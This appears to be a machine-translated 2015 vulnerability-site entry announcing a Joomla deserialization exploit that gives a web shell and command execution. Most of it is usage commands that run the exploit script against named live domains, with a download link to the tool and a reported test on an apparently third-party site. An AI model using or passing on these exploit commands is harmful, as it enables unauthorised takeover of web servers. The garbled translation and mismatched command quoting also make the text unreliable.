joomla deserialization vulnerability in getshell&&command execution-vulnerability warning-the black bar safety net

2015-12-20T00:00:00
ID MYHACK58:62201570201
Type myhack58
Reporter whirlwind
Modified 2015-12-20T00:00:00

Description

Note: 1. Remember the command after the points number, the command with single quotes. 2. For learning php code to use

Usage:

`php joomla.php http://xatusec.org getshell

php joomla.php http://xatusec.org the command 'phpinfo();" ! 2015-12-17 01-08-13 of the screen captures of Fig. png Download: https://github.com/whirlwind110/joomla-getshell-EXP

Update using the$_SERVER[\'DOCUMENT_ROOT\']directly, rather than the silly first phpinfo to match. Then sent a test php joomla.php http://enoki.jp/ getshell